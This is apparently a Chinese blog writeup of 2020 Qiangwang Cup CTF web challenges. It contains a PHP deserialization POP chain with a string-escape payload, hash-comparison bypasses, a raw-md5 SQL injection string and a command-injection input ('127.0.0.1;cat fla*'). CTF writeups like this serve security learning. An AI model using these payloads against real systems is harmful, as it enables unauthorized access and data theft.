2020强网杯 强网先锋web writeup

彩笔跟着队里师傅复现

强网先锋

web辅助

反序列化逃逸,先构造pop链

<?php
class player{
    protected $user;
    protected $pass;
    protected $admin;
    public function __construct($user, $pass, $admin = 0){
        $this->user = $user;
        $this->pass = $pass;
        $this->admin = $admin;
    }
    public function get_admin(){
        return $this->admin;
    }
}

class topsolo{
    protected $name;
    public function __construct($name = 'Riven'){
        $this->name = $name;
    }

    public function TP(){
        if (gettype($this->name) === "function" or gettype($this->name) === "object"){
            $name = $this->name;
            $name();
        }
    }
    public function __wakeup(){
        $this->TP();
    }
}

class midsolo{
    protected $name;
    public function __construct($name){
        $this->name = $name;
    }

    public function __wakeup(){
        if ($this->name !== 'Yasuo'){
            $this->name = 'Yasuo';
            echo "No Yasuo! No Soul!\n";
        }
    }
    public function __invoke(){
        $this->Gank();
    }
    public function Gank(){
        if (stristr($this->name, 'Yasuo')){
            echo "Are you orphan?\n";
        }
        else{
            echo "Must Be Yasuo!\n";
        }
    }
}
class jungle{
    protected $name = "";
    public function __construct($name = NULL){
        $this->name = $name;
    }
    public function KS(){
        phpinfo();
    }
    public function __toString(){
        $this->KS();
        return "";
    }
}
$jungle=new jungle();
$midsolo=new midsolo($jungle);
$topsolo=new topsolo($midsolo);
echo serialize($topsolo);

然后进行反序列化逃逸

%title插图%num

110长度的user数据被当作字符串,后面的数据完成逃逸

%title插图%num

$username='\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0';
$password='";s:7:"%00*%00pass";s:0:"";s:8:"%00*%00admin";'.$pop;

传入payload:

?username=%27\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0%27&password=%22;s:7:%22%00*%00pass%22;s:0:%22%22;s:8:%22%00*%00admin%22;O:7:%22topsolo%22:2:{S:7:%22\00*\00\6e\61\6d\65%22;O:7:%22midsolo%22:1:{S:7:%22\00*\00\6e\61\6d\65%22;O:6:%22jungle%22:1:{S:7:%22\00*\00\6e\61\6d\65%22;N

%title插图%num

%title插图%num

Funhash

//level 1
if ($_GET["hash1"] != hash("md4", $_GET["hash1"]))
{
    die('level 1 failed');
}

level 1判断条件hash1的原始值要等于 hash1的md4加密值,类似md5,写个爆破脚本:

<?php

$i=1;
while ($i<=1000000000)
{
    $i++;
    $n="0e".$i;
    if ($n == hash("md4",$n))
    {
        echo "hash:$n";
        exit();
    }
}
?>

%title插图%num

//level 2
if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['hash2']) !== md5($_GET['hash3']))
{
    die('level 2 failed');
}

判断条件 hash2不能和hash3全等, hash2的md5要和hash3的md5相同,
我们使用php中md5的特性来绕过,
传 hash2[]=1&hash3[]=2

//level 3
$query = "SELECT * FROM flag WHERE password = '" . md5($_GET["hash4"],true) . "'";
$result = $mysqli->query($query);
$row = $result->fetch_assoc(); 
var_dump($row);
$result->free();
$mysqli->close();

level 3关键就是 使 md5($_GET["hash4"],true)为true

content: 129581926211651571912466741651878684928
hex: 06da5430449f8f6f23dfc1276f722738
raw: \x06\xdaT0D\x9f\x8fo#\xdf\xc1'or'8
string: T0Do#'or'8

最后构造payload:

?hash1=0e251288019&hash2[]=1&hash3[]=2&hash4=129581926211651571912466741651878684928

%title插图%num

主动

127.0.0.1;cat fla*
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇